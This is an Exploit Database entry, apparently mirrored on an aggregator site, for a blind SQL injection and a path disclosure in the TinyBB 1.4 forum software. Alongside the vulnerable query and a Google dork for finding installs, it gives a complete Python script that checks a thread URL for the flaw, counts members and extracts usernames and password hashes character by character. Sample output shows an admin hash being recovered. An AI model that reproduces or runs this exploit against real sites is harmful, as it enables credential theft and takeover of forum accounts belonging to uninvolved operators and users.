TinyBB 1.4 – Blind SQL Injection / Full Path Disclosure

• Exploit Database
• 12 阅读

• 作者： swami
  日期： 2011-04-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17165/

• # Exploit Title: TinyBB 1.4 Sql Injection + Path Disclosure
  # Google Dork: "Proudly powered by TinyBB"
  # Date: 7 April 2011
  # Author : swami
  # Contact : flavio[dot]baldassi[at]gmail[dot]com
  # Version: 1.4
  # Tested on : Centos 5.5 with magic_quotes_gpc off
  # Thanks to: ptrace.net
  #
  #From tinybb.net
  #-------------------------
  #"TinyBB is a free, simple bulletin board script. TinyBB's community is slowly growing and the number
  # of installs is slowly rising. TinyBB's software is 100% free and so are our official add-ons."
  # 
  #Sql Injection [Fixed]
  #-----------------------
  #Thevulnerability exist in /inc/viewthread.php file at line 3. As you can see below the $_GET['post'] parameter isn't
  #properly sanitized.
  #
  # $check_thread = mysql_query("SELECT * FROM `tinybb_threads` WHERE
  # `thread_key` = '$_GET[post]'") or die(mysql_error()); 
  #
  #Path Disclosure [Not fixed]
  #--------------------
  # A remote user can access these files to cause the system to display an error message that indicates the installation# path.
  # 1-http://host/inc/login.php
  # 2-http://host/inc/categories.php
  #
  #swami@swami-desktop:~/Documents/py$ ./tinybb.py
  #
  # [+] TinyBB thread url: http://192.168.2.6/tinybb/index.php?page=thread&post=444709648
  # [?] Set up a Proxy ? [y/n] y
  # [+] Proxy ip:port: 127.0.0.1:3128
  # [+] Proxy is found to be working
  # [+] Testing url: http://192.168.2.6/tinybb/index.php?page=thread&post=444709648
  # [+] Url vulnerable: YES
  # [+] Users into the db: 1
  # [+] Executing blind sql injection, this will take time ...
  #
  # [+] UserId 76: admin:64d7103eef2b14bbb2d0b57c38cc3fbee29ff72a
  #
  # [+] Done
  #
  
  #!/usr/bin/python
  #
  import sys
  import urllib.request
  
  def banner():
  	
   print('+				 +')
   print('| ------------------------------ |')
   print('| TinyBB 1.4 Blind Sql INjector|')
   print('| ------------------------------ |')
   print('+ by swami			 +\n')
  
  def setProxy(ip):
  	
   try:
   	proxy = urllib.request.ProxyHandler( {'http':'http://'+ str(ip) } )
   	opener = urllib.request.build_opener( proxy )
   	opener.open('http://www.google.com')
   	print('[+] Proxy is found to be working')
  
   except:
   	print('[-] Proxy doesn\'t work')
   	print('[-] Exit ...')
   	sys.exit(1)
  
   return opener
  
  def testUrl(url, handle):
  
   print('[+] Testing url: '+ url)
  
   try:
   	req = handle.open( url )
   	req = req.read().decode('utf-8')
  
   except:
   	print('[-] '+ url +' is not a valid url')
   	print('[-] Exit ...')
   	sys.exit(1)
  
   return req
  
  def urlVulnerable(url, clean, handle):
  
   sys.stdout.write('[+] Url vulnerable: ')
  
   try:
   	req = handle.open( url + "'" )
   	req = req.read().decode('utf-8')
  
   except:
  sys.exit('\n[-] Url typing error')
  
  
   if len(clean) > len(req):
   	sys.stdout.write('YES\n')
   	sys.stdout.flush()
  
   else:
   	sys.stdout.write('NO\n[-] Exit...\n')
   	sys.stdout.flush()
   	sys.exit(1)
  	
  def getTrueValue(url, handle):
  
   trueValue = handle.open( url + "'%20and%20'1'='1" )
   return len( trueValue.read().decode('utf-8') )
  
  
  def getNUsers(url, trueValue, handle):
  
   users = list()
  
   sys.stdout.write('[+] Users into the db: ')
   sys.stdout.flush()
  
   for userid in range(1,100):
  
   	inject = url + "'%20and%20(SELECT%201%20FROM%20members%20WHERE%20id="+ str(userid) +")='1"
  
   	try:
   		req = handle.open( inject )
   		req = req.read().decode('utf-8')
  
   	except:
   		print('[-] Somenthing went wrong')
   		sys.exit(1)
  
   	if len(req) == trueValue:
   		users.append(userid)
  
   sys.stdout.write( str(len(users)) )
  
   return users
  
  
  def doBlind(url, handle, nUserId, trueValue):
  
  	print('\n[+] Executing blind sql injection, this will take time ...\n')
  
  	for x in range(len(nUserId)):
  
  		position = 1 # Line position
  		userid = nUserId[x]
  		char = 33 # Start from !
  
  		sys.stdout.write('[+] UserId '+ str(userid) +': ')
  		sys.stdout.flush()
  
  		# Execute Blind Sql INjection
  		while True:
  
  			inject = url
  			inject += "'%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20FROM%20"
  			inject += "members%20WHERE%20id="+ str(userid) +"),"+ str(position) +",1))>"+ str(char) +"%20--'"
  
  			result = handle.open( inject )
  			result = result.read().decode('utf-8')
  
  			# If we don't get errors
  			if len(result) == trueValue:
  				char += 1
  
  			else:
  
  				if position > 43 and chr(char) == "!":
  					break
  
  				else:
  					sys.stdout.write( chr(char) )
  					sys.stdout.flush()
  					position += 1
  					char = 33 #Reset char
  
  			if char == 127 :
  				print('[-] Ascii table is over. Exit... :/')
  				sys.exit(1)
  
  		print()
  
  
  if __name__ == "__main__":
  
  	banner()
  	url = input('[+] TinyBB thread url: ')
  
  	if input('[?] Set up a Proxy ? [y/n] ') == 'y' :
  		handle = setProxy( input('[+] Proxy ip:port: ') )
  
  	else:
  		handle = urllib.request.build_opener()
  
  	clean = testUrl(url, handle)
  	urlVulnerable(url, clean, handle)
  	trueValue = getTrueValue(url, handle)
  	userId = getNUsers(url, trueValue, handle)
  	doBlind(url, handle, userId, trueValue)
  
  	print('\n[+] Done ')